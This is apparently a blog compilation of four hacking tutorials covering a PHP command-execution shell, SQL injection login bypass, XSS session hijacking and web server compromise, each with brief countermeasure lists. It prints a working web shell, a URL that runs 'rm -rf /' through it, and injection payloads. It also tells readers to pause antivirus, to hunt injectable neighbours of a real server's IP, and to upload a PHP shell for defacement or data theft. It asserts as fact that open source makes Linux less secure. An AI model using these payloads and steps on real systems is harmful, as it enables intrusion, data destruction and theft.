Hacking Linux Systems

Linux is the most widely used server operating system especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.

In this article, we will introduce you towhat Linux is, its security vulnerabilities and the counter measures you can put in place.

Topics covered in this tutorial

Quick Note on Linux

Linux is an open source operating system. There are many distributions of Linux based operating systems such as Redhat, Fedora, and Ubuntu etc. Unlike other operating system, Linux is less secure when it comes to security. This is because the source code is available freely so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source. Linux can be used as a server, desktop, tablet, or Mobile device operating system.

Linux programs can be operated using either GUI or commands. The commands are more effective and efficient compared to using the GUI. For this reason, it helps to know Linux basic commands.

Refer to these tutorials http://www.guru99.com/unix-linux-tutorial.html on how to get started with Linux.

Linux Hacking Tools

Nessus– this tool can be used to scan configuration settings, patches, and networks etc. it can be found at http://www.tenable.com/products/nessus
NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at http://nmap.org/
SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.html

The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.

How to prevent Linux hacks

Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.

Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.

Hacking Activity: Hack a Linux system using PHP

In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.

PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as string.

For demonstration purposes, let’s assume the attacker managers to upload the following file on a web server.<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HERE,

The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.

The above code can be exploited using the following URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HERE,

“…konsole.php?cmd=ls%20-l”assigns the value ls –l to the variable cmd.

The command executed against the server will be

shell_exec('ls -l') ;

Executing the above code on a web server gives results similar to the following.

The above command simply displays the files in the current directory and the permissions

Let’s suppose the attacker passes the following command

rm -rf /

HERE,

“rm” removes the files
“rf” makes the rm command run in a recursive mode. Deleting all the folders and files
“/” instructs the command to start deleting files from the root directory

The attack URL would look something like this

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Summary

Linux is a popular operating system for servers, desktops, tablets and mobile devices.
Linux is open source and the source code can be obtained by anyone. This makes it easy to spot the vulnerabilities.
Basic and networking commands are valuable to Linux hackers.
Vulnerabilities are weakness that can be exploited to compromise a system.
A good security can help to protect a system from been compromised by an attacker.

Learn SQL Injection with practical example

HACKING

muhammed ramshin 02:29 Add Comment

muhammed ramshin

Learn SQL Injection with practical example

Data is one of the most vital components of information systems. Database powered web applications are used by organization to get data from customers. SQL injection takes advantage of the design flaws in poorly designed web applications to poison SQL statements to execute malicious statements.

In this article, we will introduce you toSQL Injection techniques and how you can protect web applications from such attacks.

Topics covered in this tutorial

What is a SQL Injection?

SQL is the acronym for Structured Query Language. It is used to retrieve and manipulate data in the database. SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true.

How SQL Injection Works

The types of attacks that can be performed using SQL injection vary depending on the type of database engine. The attack works on dynamic SQL statements. A dynamic statement is a statement that is generated at run time using parameters password from a web form or URI query string.

Let’s consider a simple web application with a login form. The code for the HTML form is shown below.

<form action=‘index.php’ method="post">

<input type="email" name="email" required="required"/>

<input type="password" name="password"/>

<input type="checkbox" name="remember_me" value="Remember me"/>

<input type="submit" value="Submit"/>

</form>

HERE,

The above form accepts the email address and password then submits them to a PHP file named index.php.
It has an option of storing the login session in a cookie. We have deduced this from the remember_me checkbox. It uses the post method to submit data. This means the values are not displayed in the URL.

Let’s suppose the statement at the backend for checking user ID is as follows

SELECT * FROM users WHERE email = $_POST['email'] AND password = md5($_POST['password']);

HERE,

The above statement uses the values of the $_POST[] array directly without sanitizing them.
The password is encrypted using MD5 algorithm.

We will illustrate SQL injection attack using sqlfiddle. Open the URL http://sqlfiddle.com/ in your web browser. You will get the following window.

Note: you will have to write the SQL statements

Step 1)Enter this code in left pane

CREATE TABLE `techpand`.`users` (

  `id` INT NOT NULL AUTO_INCREMENT,

  `email` VARCHAR(45) NULL,

  `password` VARCHAR(45) NULL,

  PRIMARY KEY (`id`));

insert into users (email,password) values ('m@m.com',md5('abc'));

Step 2) Enter this code in right pane

select * from users;

Step 3) Click Build Schema

Step 4)Click Run SQL. You will see following result

Suppose a user supplies admin@admin.sys and 1234 as the password. The statement to be executed against the database would be

SELECT * FROM users WHERE email = 'admin@admin.sys' AND password = md5('1234');

The above code can be exploited by commenting out the password part and appending a condition that will always be true. Let’s suppose an attacker provides the following input in the email address field.

xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ]

xxx for the password.

The generated dynamic statement will be as follows.

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND password = md5('1234');

HERE,

xxx@xxx.xxx ends with a single quote which completes the string quote
OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to only one record.
-- ' AND … is a SQL comment that eliminates the password part.

Copy the above SQL statement and paste it in SQL FiddleRun SQL Text box as shown below

Hacking Activity: SQL Inject a Web Application

We have a simple web application at http://www.techpanda.org/ that is vulnerable to SQL Injection attacks for demonstration purposes only. The HTML form code above is taken from the login page. The application provides basic security such as sanitizing the email field. This means our above code cannot be used to bypass the login.

To get round that, we can instead exploit the password field. The diagram below shows the steps that you must follow

Let’s suppose an attacker provides the following input

Step 1: Enter xxx@xxx.xxx as the email address
Step 2: Enter xxx') OR 1 = 1 -- ]

Click on Submit button
You will be directed to the dashboard

The generated SQL statement will be as follows

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' AND password = md5('xxx') OR 1 = 1 -- ]');

The diagram below illustrates the statement has been generated.

HERE,

The statement intelligently assumes md5 encryption is used
Completes the single quote and closing bracket
Appends a condition to the statement that will always be true

In general, a successful SQL Injection attack attempts a number of different techniques such as the ones demonstrated above to carry out a successful attack.

Other SQL Injection attack types

SQL Injections can do more harm than just by passing the login algorithms. Some of the attacks include

Deleting data
Updating data
Inserting data
Executing commands on the server that can download and install malicious programs such as Trojans
Exporting valuable data such as credit card details, email and passwords to the attacker’s remote server
Getting user login details etc

The above list is not exhaustive; it just gives you an idea of what SQL Injection

Automation Tools for SQL Injection

In the above example, we used manual attack techniques based on our vast knowledge ofSQL. There are automated tools that can help you perform the attacks more efficiently and within the shortest possible time. These tools include

SQLDict - http://ntsecurity.nu/toolbox/sqldict/
SQLSmack - http://www.securiteam.com/tools/5GP081P75C.html
SQLPing 2 - http://www.sqlsecurity.com/downloads/sqlping2.zip?attredirects=0&d=1
SQLMap - http://sqlmap.org/

How to guard against SQL Injection Attacks

An organization can adopt the following policy to protect itself against SQL Injection attacks.

User input should never be trusted. It must always be sanitized before it is used in dynamic SQL statements.
Stored procedures – these can encapsulate the SQL statements and treat all input as parameters.
Prepared statements –prepared statements work by creating the SQL statement first then treating all submitted user data as parameters. This has no effect on the syntax of the SQL statement.
Regular expressions –these can be used to detect potential harmful code and remove it before executing the SQL statements.
Database connection user access rights –only necessary access rights should be given to accounts used to connect to the database. This can help reduce what the SQL statements can perform on the server.
Error messages –these should not reveal sensitive information and where exactly an error occurred. Simple custom error messages such as “Sorry, we are experiencing technical errors. The technical team has been contacted. Please try again later” can be used instead of display the SQL statements that caused the error.

Hacking Activity: Use Havij for SQL Injection

In this practical scenario, we are going to use Havij Advanced SQL Injection program to scan a website for vulnerabilities.

Note: your anti-virus program may flag it due to its nature. You should add it to the exclusions list or pause your anti-virus software.

The image below shows the main window for Havij

The above tool can be used to assess the vulnerability of a web site/application.

Summary

SQL Injection is an attack type that exploits bad SQL statements
SQL injection can be used to bypass login algorithms, retrieve, insert, and update and delete data.
SQL injection tools include SQLMap, SQLPing, and SQLSmack etc.
A good security policy when writing SQL statement can help reduce SQL injection attacks.

How to hack a Website

HACKING

muhammed ramshin 02:26 2 Comments

muhammed ramshin

How to hack a Website

More people have access to the internet than ever before. This has prompted many organizations to develop web based applications that users can use online to interact with the organization. Poorly written code for web applications can be exploited to gain unauthorized access to sensitive data and web servers.

In this article, we will introduce you to web applications hacking techniques and the counter measures you can put in place to protect against such attacks.

Topics covered in this tutorial

What is a web application? What are Web Threats?
How to protect your Website against hacks ?
Hacking Activity: Hack a Website !

What is a web application? What are Web Threats?

A web application (aka website) is an application based on the client-server model. The server provides the database access and the business logic. It is hosted on a web server. The client application runs on the client web browser. Web applications are usually written in languages such as Java, C# and VB.Net, PHP, ColdFusion Markup Language etc. the database engines used in web applications include MySQL, MS SQL Server, PostgreSQL, SQLite etc.

Most web applications are hosted on public servers accessible via the internet. This makes them vulnerable to attacks due to easy accessibility. The following are common web application threats.

SQL Injection – the goal of this threat could be to bypass login algorithms, sabotage the data etc.
Denial of Service Attacks– the goal of this threat could be to deny legitimate users access to the resource
Cross Site Scripting XSS– the goal of this threat could be to inject code that can be executed on the client side browser.
Cookie/Session Poisoning– the goal of this threat is to modify cookies/session data by an attacker to gain unauthorized access.
Form tempering– the goal of this threat is to modify form data such as prices in e-commerce applications so that the attacker can get items at reduced prices.
Code Injection – the goal of this threat is to inject code such as PHP, Python etc that can be executed on the server. The code can install backdoors, reveal sensitive information etc.
Defacement– the goal of this threat is to modify the page been displayed on a website and redirecting all page requests to a single page that contains the attacker’s message.

How to protect your Website against hacks ?

An organization can adopt the following policy to protect itself against web server attacks.

SQL Injection– sanitizing and validating user parameters before submitting them to the database for processing can help reduce the chances of been attacked via SQL Injection. Database engines such as MS SQL Server, MySQL etc support parameters and prepared statements. They are much safer than traditional SQL statements
Denial of Service Attacks – firewalls can be used to drop traffic from suspicious IP address if the attack is a simple DoS. Proper configuration of networks and Intrusion Detection System can also help reduce the chances of a DoS attack been successful.
Cross Site Scripting – validating and sanitizing headers, parameters passed via the URL, form parameters and hidden values can help reduce XSS attacks.
Cookie/Session Poisoning– this can be prevented by encrypting the contents of the cookies, timing out the cookies after some time, associating the cookies with the client IP address that was used to create them.
Form tempering – this can be prevented by validating and verifying the user input before processing it.
Code Injection - this can be prevented by treating all parameters as data rather than executable code. Sanitization and validation can be used to implement this.
Defacement – a good web application development security policy should ensure that it seals the commonly used vulnerabilities to access the web server. This can be proper configuration of the operating system, web server software and best security practices when developing web applications.

Hacking Activity: Hack a Website

In this practical scenario, we are going to hijack the user session of the web application located at www.techpanda.org. We will use cross site scripting to read the cookie session id then use it to impersonate a legitimate user session.

The assumption made is that the attacker has access to the web application and he would like to hijack the sessions of other users that use the same application. The goal of this attack could be to gain admin access to the web application assuming the attacker’s access account is a limited one.

Getting started

Open http://www.techpanda.org/
For practice purposes, it is strongly recommended to gain access using SQL Injection. Refer to this article for more information on how to do that.
The login email is admin@google.com, the password is Password2010
If you have logged in successfully, then you will get the following dashboard

Click on Add New Contact
Enter the following as the first name

HERE,

The above code uses JavaScript. It adds a hyperlink with an onclick event. When the unsuspecting user clicks the link, the event retrieves the PHP cookie session ID and sends it to the snatch_sess_id.php page together with the session id in the URL

Enter the remaining details as shown below
Click on Save Changes

Your dashboard will now look like the following screen

Since the cross site script code is stored in the database, it will be loaded everytime the users with access rights login
Let’s suppose the administrator logins and clicks on the hyperlink that says Dark
He/she will get the window with the session id showing in the URL

Note: the script could be sending the value to some remote server where the PHPSESSID is stored then the user redirected back to the website as if nothing happened.

The PHPSESSID is board and it is the part that we are interested in.

Note: the value you get may be different from the one in this tutorial but the concept is the same

Session Impersonation using Firefox and Tamper Data add-on

The flowchart below shows the steps that you must take in order to successfully complete this exercise.

You will need Firefox web browser for this section and Tamper Data add-on
Open Firefox and install the add as shown in the diagrams below

Search for tamper data then click on install as shown above

Click on Accept and Install…

Click on Restart now when the installation completes
Enable the menu bar in Firefox if it is not shown

Click on tools menu then select Tamper Data as shown below

You will get the following window. Note: If the windows is not empty, hit the clear button

Click on Start Tamper menu
Switch back to Firefox web browser, type http://www.techpanda.org/dashboard.php then press the enter key to load the page
You will get the following pop up from Tamper Data

The pop up window has three (3) options. The Tamper option allows you to modify the HTTP header information before it is submitted to the server.
Click on it
You will get the following window

Copy the PHP session ID you copied from the attack URL and paste it after the equal sign. Your value should now look like this

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

Click on OK button
You will get the Tamper data popup window again

Uncheck the checkbox that asks Continue Tampering?
Click on submit button when done
You should be able to see the dashboard as shown below

Note: we did not login, we impersonated a login session using the PHPSESSID value we retrieved using cross site scripting

Summary

A web application is based on the server-client model. The client side uses the web browser to access the resources on the server.
Web applications are usually accessible over the internet. This makes them vulnerable to attacks.
Web application threats include SQL injection, Code Injection, XSS, Defacement, Cookie poisoning etc.
A good security policy when developing web applications can help make them secure.

How to hack a Web Server

HACKING

muhammed ramshin 02:22 2 Comments

muhammed ramshin

How to hack a Web Server

ustomers usually turn to the internet to get information and buy products and services. Towards that end, most organizations have websites.Most websites store valuable information such as credit card numbers, email address and passwords etc. This has made them targets to attackers. Defaced websites can also be used to communicate religious or political ideologies etc.

In this article, we will introduce you toweb servers hacking techniques and how you can protect servers from such attacks.

Topics covered in this tutorial

Web server vulnerabilities
Types of Web Servers
Types of Attacks against Web Servers
Effects of successful attacks
Web server attack tools
How to avoid attacks on Web server
Hacking Activity: Hack a WebServer

Web server vulnerabilities

A web server is program that stores files (usually web pages) and makes them accessible via the network or internet. A web server requires both hardware and software. Attackers usually target the exploits in the software to gain authorized entry to the server. Let’s look at some of the common vulnerabilities that attackers take advantage of.

Default settings– These settings such as default user id and passwords can be easily guessed by the attackers. Default settings might also allow perform certain tasks such as running commands on the server which can be exploited.
Misconfigurationof operating systems and networks – certain configuration such as allowing users to execute commands on the server can be dangerous if the user does not have a good password.
Bugs in the operating system and web servers– discovered bugs in the operating system or web server software can also be exploited to gain unauthorized access to the system.

In additional to the above mentioned web server vulnerabilities, the following can also led to unauthorized access

Lack of security policy and procedures– lack of a security policy and procedures such as updating antivirus software, patching the operating system and web server software can create security loop holes for attackers.

Types of Web Servers

The following is a list of the common web servers

Apache– This is the commonly used web server on the internet. It is cross platform but is it’s usually installed on Linux. Most PHP websites are hosted on Apache servers.
Internet Information Services (IIS)– It is developed by Microsoft. It runs on windows and is the second most used web server on the internet. Most asp and aspx websites are hosted on IIS servers.
Apache Tomcat – Most Java server pages (jsp) websites are hosted on this type of web server.
Other web servers – These include Novell's Web Server and IBM’s Lotus Domino servers.

Types of Attacks against Web Servers

Directory traversal attacks– This type of attacks exploits bugs in the web server to gain unauthorized access to files and folders that are not in the public domain. Once the attacker has gained access, they can download sensitive information, execute commands on the server or install malicious software.

Denial of Service Attacks– With this type of attack, the web server may crash or become unavailable to the legitimate users.
Domain Name System Hijacking – Withthis type of attacker, the DNS setting are changed to point to the attacker’s web server. All traffic that was supposed to be sent to the web server is redirected to the wrong one.
Sniffing– Unencrypted data sent over the network may be intercepted and used to gain unauthorized access to the web server.
Phishing– With this type of attack, the attack impersonates the websites and directs traffic to the fake website. Unsuspecting users may be tricked into submitting sensitive data such as login details, credit card numbers etc.
Pharming– With this type of attack, the attacker compromises the Domain Name System (DNS) servers or on the user computer so that traffic is directed to a malicious site.
Defacement– With this type of attack, the attacker replaces the organization’s website with a different page that contains the hacker’s name, images and may include background music and messages.

Effects of successful attacks

An organization’s reputation can be ruinedif the attacker edits the website content and includes malicious information or links to a porn website
The web server can be used to install malicious software on users who visit the compromised website. The malicious software downloaded onto the visitor’s computer can be a virus, Trojan or botnet software etc.
Compromised user data may be used for fraudulent activitieswhich may lead to business loss or lawsuits from the users who entrusted their details with the organization

Web server attack tools

Some of the common web server attack tools include;

Metasploit– this is an open source tool for developing, Testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server.
MPack– this is a web exploitation tool. It was written in PHP and is backed by MySQL as the database engine. Once a web server has been compromised using MPack, all traffic to it is redirected to malicious download websites.
Zeus– this tool can be used to turn a compromised computer into a bot or zombie. A bot is a compromised computer which is used to perform internet based attacks. A botnet is a collection of compromised computers. The botnet can then be used in a denial of service attack or sending spam mails.
Neosplit – this tool can be used to install programs, delete programs, replicating it etc.

How to avoid attacks on Web server

An organization can adopt the following policy to protect itself against web server attacks.

Patch management– this involves installing patches to help secure the server. A patch is an update that fixes a bug in software. The patches can be applied to the operating system and the web server system.
Secure installation and configuration of the operating system
Secure installation and configuration of the web server software
Vulnerability scanning system– these include tools such as Snort, NMap, Scanner Access Now Easy (SANE)
Firewalls can be used to stop simple DoS attacks by blocking all traffic coming the identify source IP addresses of the attacker.
Antivirus software can be used to remove malicious software on the server
Disabling Remote Administration
Default accounts and unused accounts must be removedfrom the system
Default ports & settings (like FTP at port 21) should be changed to custom port & settings (FTP port at 5069)

Hacking Activity: Hack a WebServer

In this practical scenario, we are going to look at the anatomy of a web server attack. We will assume we are targeting www.techpanda.org. We are not actually going to hack into it as this is illegal. We will only use the domain for educational purposes.

What we will need

A target www.techpanda.org
Bing search engine
SQL Injection tools
PHP Shell, we will use dk shell http://sourceforge.net/projects/icfdkshell/

Information gathering

We will need to get the IP address of our target and find other websites that share the same IP address.

We will use an online tool to find the target’s IP address and other websites sharing the IP address

Enter the URL http://www.yougetsignal.com/tools/web-sites-on-web-server/ in your web browser
Enter www.techpanda.org as the target

Click on Check button
You will get the following results

Based on the above results, the IP address of the target is 69.195.124.112

We also found out that there are 403 domains on the same web server.

Our next step is to scan the other websites for SQL injection vulnerabilities. Note: if we can find a SQL vulnerable on the target, then we would directly exploit it without considering other websites.

Enter the URL www.bing.com into your web browser. This will only work with bing so don’t use other search engines such as google or yahoo
Enter the following search query

ip:69.195.124.112 .php?id=

HERE,

“ip:69.195.124.112” limits the search to all the websites hosted on the web server with IP address 69.195.124.112
“.php?id=” search for URL GET variables used a parameters for SQL statements.

You will get the following results

As you can see from the above results, all the websites using GET variables as parameters for SQL injection have been listed.

The next logic step would be to scan the listed websites for SQL Injection vulnerabilities. You can do this using manual SQL injection or using tools listed in this article on SQL Injection.

Uploading the PHP Shell

We will not scan any of the websites listed as this is illegal. Let’s assume that we have managed to login into one of them. You will have to upload the PHP shell that you downloaded from http://sourceforge.net/projects/icfdkshell/

Open the URL where you uploaded the dk.php file.
You will get the following window

Clicking the Symlink URL will give you access to the files in the target domain.

Once you have access to the files, you can get login credentials to the database and do whatever you want such as defacement, downloading data such as emails etc.

Summary

Web server stored valuable information and are accessible to the public domain. This makes them targets for attackers.
The commonly used web servers include Apache and Internet Information Service IIS
Attacks against web servers take advantage of the bugs and Misconfiguration in the operating system, web servers and networks
Popular web server hacking tools include Neosploit, MPack and ZeuS.
A good security policy can reduce the chances of been attacked